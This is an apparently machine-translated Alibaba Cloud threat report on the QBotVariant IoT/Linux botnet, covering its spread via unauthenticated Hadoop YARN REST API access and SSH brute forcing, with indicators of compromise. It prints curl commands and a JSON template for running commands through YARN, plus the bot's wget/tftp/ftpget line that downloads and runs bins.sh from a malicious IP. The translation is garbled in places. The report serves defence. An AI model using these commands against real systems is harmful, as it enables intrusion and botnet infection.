The Internet brings convenience to people at the same time, its open a large number of resources are also malicious users with convenience, more and more open malicious program source code to reduce the external attack, the difficulty of invasion, making the security problem more serious.

Ali Cloud security team monitored a BOT family in May this year, whose samples were rewritten from the open channel source code of the Internet and widely spread on the Internet, causing great harm. The cloud security team analyzed, clustering and traced this kind of samples, so we named it As QBotVariant.

QBotVariant has DDoS attacks, backdoors, downloaders and brute force cracking. Once it is hacked, it becomes a Trojan horse. It mainly spreads through unauthorized access vulnerability of Hadoop Yarn resource management system REST API and brute force cracking based on weak passwords. The BOT family, like Mirai, targets multiple versions of operating systems. Servers are not only compromised, but IOT devices such as CCTV monitoring and home routing are more vulnerable to attack and intrusion. Radware’s Pascal Geenens mentioned this type of sample in a recent blog post, New DemonBot Discovered, but the IP, sample, and other information he found is only one sample in this family. More than 30 download servers have been Discovered. QBotVariant’s varied IP and binary sample variants make it difficult to find and track.

On the cloud platform, the activity of QBotVariant we have detected is as follows, reaching thousands at the peak, and the activity has not decreased.



Below, we will analyze QBotVariant in detail from multiple perspectives, such as transmission mode, script analysis, sample analysis and traceability.

Mode of invasion and transmission

The QBotVariant family spreads in two ways: one is to use unauthorized access vulnerability of REST API of Hadoop Yarn resource management system for intrusion; the other is to use hard-coded weak passwords for SSH brute force cracking.



Hadoop is a distributed system framework developed by the Apache Foundation. It implements distributed processing using the MapReduce algorithm. Yarn is a Hadoop cluster resource management system. The Hadoop Yarn resource management system is improperly configured, enabling unauthorized access and malicious use by attackers. An attacker can execute arbitrary code through the REST API deployment task without authentication, ultimately taking full control of the server.

The problem is caused by the port that enables the following functions

Yarn. The resourcemanager. Webapp. Address, the default port 8088

Yarn. The resourcemanager. Webapp. HTTPS. The address, the default port 8090

By applying the new application, follow the instructions below

curl -v -X POST ‘http://ip:port/ws/v1/cluster/apps/new-application’

Then execute the following command to complete the invasion

curl -s -i -X POST -H ‘Accept:application/json’ -H ‘Content-Type:application/json’http://ip:port/ws/v1/cluster/apps -data-binary @example.json

The example.json file is shown below

{

“am-container-spec”:{

“commands”:{

“Command “:” Execute the command written here”

}

},

“application-id”:”application_xxxx_xxxxx”,

“application-name”:”test”,

“application-type”:”YARN”

}

Script analysis

We have traced back to the original version of QBotVariant, which supports the execution of wGET, TFTP, ftpget and other scripts. The scripts can be downloaded and executed from a remote download server

bash -c cd /tmp || cd /var/run || cd /mnt || cd /root || cd /;

Wget HTTP: / / http://185.244.25.153/bins.sh; chmod 777 bins.sh; sh bins.sh;

TFTP 185.244.25.153 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh;

TFTP -r tftp2.sh -g 185.244.25.153; chmod 777 tftp2.sh; sh tftp2.sh;

Ftpget -v -u anonymous -p anonymous -p 21 185.244.25.153 ftp1.sh ftp1.sh; sh ftp1.sh tftp1.sh tftp2.sh ftp1.sh

The following is a rewritten download script intercepted by Ali Cloud security. It can be seen from the script that the author compiled different versions of the program, disguised by NTPD, SSHD, OpenSSH, etc., in order to be able to support IOT devices well. On the other hand, busyBox support is added to each command line, which makes this class of scripts well supported on IOT devices, providing an easy way to distribute QBotVaraint.



There are scripts for compiling multiple versions in the source code captured by Ali Cloud



QBotVariant supports version types and their corresponding binary names:

Supported Version types

Corresponding binary name

Supported Version types

Corresponding binary name

mips

ntpd

i586

ftp

mipsel

sshd

m68k

pftp

sh4

openssh

sparc

sh

x86_64

bash

armv4l


armv6l

tftp

armv5l

apache2

i686

wget

powerpc-440fp

telnetd

powerpc

cron



Sample analysis

Ali Cloud intercepted many batches of samples are relatively similar, are adapted to QBot. Some authors may cut some functions in order to simplify the samples or carry out soft counterattack. We randomly compare the two captured samples. The sample on the right of the figure cuts getRandomPublicIP function, which only realizes a few functions of QBot, with smaller files and more single functions.



However, most of the samples have realized their basic functions, and their properties of propagation and harmfulness have not changed. Some functions are shown in the figure



Order analysis

We have analyzed the remote control command, and its functions are shown in the figure below



It is worth paying attention to StartTheLelz function, which is mainly used for blasting randomly generated IP addresses. As shown in the figure, random IP is obtained through getRandomPublicIP function, hard-coded user name and password are stored in the structure, and then connected. The maximum blasting times are controlled by Max variable. Max is related to the number of entries in the file description table but cannot exceed 4096.



From the data area, we can see that the author has integrated several common user names and passwords for blasting



If the blasting succeeds, the following script will be executed in the blasted host to infect the host and continue to spread



In addition to the common DDoS attack methods, QBotVariant can also send spam data through sendJUNK or sendUDP. As shown in the makeRandomStr function that generates random strings, sending a large number of garbage packets can also cause network bandwidth congestion.



In order to maximize the value of intrusion, QBotVariant also provides the remote shell command execution function, which starts with “SH” and returns the command execution results to the remote controller through FDgets and sockprintf, as follows



Sample traceability/homology analysis

In the process of sample analysis, we found an interesting phenomenon. In order to avoid detection, samples have different instructions, so we selected several on-line methods of QBotVariant.

The first type of information is simple and returns information about the size side, CPU architecture, host purpose, and so on.



The second type of information is comprehensive, including the operating system, CPU architecture, host usage, port, host IP address and so on.



The third type of information, the simplest, returns only architectural information.



Fourth, return size side, schema information.



Fifth, the information is more comprehensive, including architecture information, large and small end, host IP, host purpose and other information.



Sixth, return host IP address, type, and version information.



Seventh, return architecture, host IP and other information.



When tracing the samples, we found that there were a large number of source codes and binary files of such samples on Pastebin, which existed for several months. Other IOT worms were also included in the author directory. At the same time, we found that several authors made changes to QBot, as shown in the picture of Pastebin and Github of one of the authors



QBot seems everybody know little at home, but because of the source code is simple, small, support a variety of architecture, the client has not been interrupted ever since 09 is active, is often used in remote control, such as DDoS client, in its intercepting IP, most of that in North America and Europe, but cloud platform to detect attacks from internal IP source, Domestic security personnel should be taken seriously.



low
Cloud firewall


low
Network access control





low
updates


If you use self-built Hadoop, update patches in a timely manner based on actual conditions. Hadoop versions earlier than 2.X provide security authentication and add the Kerberos authentication mechanism. It is recommended to enable Kerberos authentication or you can choose to use MaxCompute(over 8 years of “zero” security vulnerabilities) on the cloud or e-MapReduce services on the cloud.

Safety recommendations

low

low

conclusion

QBotVariant uses unauthorized access vulnerability of REST API of Hadoop Yarn Resource management system and weak password blasting to penetrate. Once infected with this worm, it will not only occupy computing resources of hosts, consume bandwidth and traffic, but also cause data leakage and data loss.

Aliyun security reminds Internet users to pay attention to the configuration of third-party applications to prevent such unauthorized vulnerabilities, and strengthen the security awareness of user names and passwords to effectively protect their assets.

IOC

Partial MD5-file name

The file name

MD5

185.244.25.153


YSDKOP.arm4

cc9de0d789efc8636946b4b41f374dfc

YSDKOP.arm5

ac94604edfe7730ccf70d5cd75610d01

YSDKOP.arm6

dcb51c5abd234a41ee0439183f53fd2d

YSDKOP.arm7

2416380b2fe0c693fd7c26a91b4cb8ee

YSDKOP.i586

2f029723c778f15e8e825976c66e45cd

YSDKOP.i686

49ec48d3afdddb098fa2c857fc63c848

YSDKOP.m68k

7efef839902ca20431d58685d9075710

YSDKOP.mips

eab0810535b45fa1bf0f6243dafb0373

YSDKOP.mpsl

a2c4e09821be6a4594e88376b9c30b5d

YSDKOP.ppc

1fc61114722f301065cd9673025ce5e0

YSDKOP.sh4

38abc827e67ff53d0814979b435e2c40

YSDKOP.sparc

20a38aeeffba9f0f1635c7b4b78f3727

YSDKOP.x86

8fd97d622e69b69a3331ee5ed08e71b2

188.166.125.19



7e9c49b9e743bcf7b382fa000c27b49d

apache2

64394fb25494b0cadf6062a0516f7c1a

bash

75e7ce8c110bb132d3897b293d42116a

cron

e8dfae1fe29183548503dc0270878e52

ftp

0e765d00f0ee174e79c81c9db812e3a2

ntpd

2cb932dcb5db84dafa8cdc6b4afa52d0

openssh

606a3169f099b0f2423c63b4ed3f9414

pftp

6666ef216ce7434927338137760f4ab0

sh

cc2e82ffbc6d5053efade4849c13099f

sshd

00b0a6516986aca277d0148c7ddf38c4

tftp

38b075ee960d08e96b2e77205ec017de

wget

58c5e1bc66ac6b364639bce4b3f76c58

Part of the IP

178.128.194.222

178.128.7.76

103.214.111.122

130.185.250.199

194.182.80.200

138.197.74.100

198.199.84.119

104.248.165.108

178.128.46.254

159.65.227.17

206.189.196.216

80.211.109.66

194.48.152.114

159.89.114.171

178.128.43.104

185.244.25.153

209.97.159.10

46.36.37.121

46.29.164.242

46.17.47.250

158.69.60.239

195.181.223.138

80.211.39.186

188.166.125.19

104.248.112.122

212.237.26.71

178.128.239.252

104.248.212.127

104.248.63.168


Partial URL and occurrence time

URL

time

http://138.197.74.100/bins.sh

20180904

http://80.211.39.186/bins.sh

20180904

http://178.128.239.252/bins.sh

20180908

http://158.69.60.239/bins/boti586final

20180908

http://158.69.60.239/bins/botx86_64final

20180908

http://158.69.60.239/bins/boti686final

20180908

http://158.69.60.239/bins.sh

20180908

http://178.128.239.252/bins.sh

20180909

http://130.185.250.199/bins.sh

20180909

http://46.17.47.250/xm2bash

20180913

http://104.248.112.122/Kuso69/Akiru.x86

20180918

http://194.182.80.200/bins.sh

20180919

http://104.248.112.122/Kuso69/Akiru.x86

20180919

http://209.97.159.10/bins.sh

20181003

http://46.17.47.250/xm2wget

20181005

http://185.244.25.153/bins.sh

20181009

http://159.65.227.17/bins.sh

20181009

http://178.128.7.76/bins.sh

20181010

http://185.244.25.153/bins.sh

20181010

http://104.248.212.127/bins.sh

20181010

http://159.65.227.17/bins.sh

20181010

http://206.189.196.216/bins.sh

20181010

http://188.166.125.19/bins.sh

20181010

http://188.166.125.19/bins.sh

20181011

http://185.244.25.153/bins.sh

20181011

http://178.128.7.76/bins.sh

20181011

http://104.248.212.127/bins.sh

20181011

http://80.211.109.66/bins.sh

20181012

http://185.244.25.153/bins.sh

20181012

http://195.181.223.138/bins.sh

20181012

http://159.89.114.171/bins.sh

20181012

http://178.128.7.76/bins.sh

20181012

http://104.248.212.127/bins.sh

20181012

http://185.244.25.153/bins.sh

20181015

http://104.248.165.108/bins.sh

20181018

http://198.199.84.119/bins.sh

20181018

http://103.214.111.122/bins.sh

20181019

http://178.128.46.254/bins.sh

20181019

http://178.128.43.104/bins.sh

20181019

http://104.248.63.168/vvglma

20181021

http://178.128.194.222/bins.sh

20181026

http://178.128.194.222/bins.sh

20181027

http://178.128.194.222/bins.sh

20181028

http://46.29.164.242/bins.sh

20181031

http://194.48.152.114/bins.sh

20181101

http://46.36.37.121/weed.sh

20181103

Refer to the link

* https://help.aliyun.com/knowledge_detail/71609.html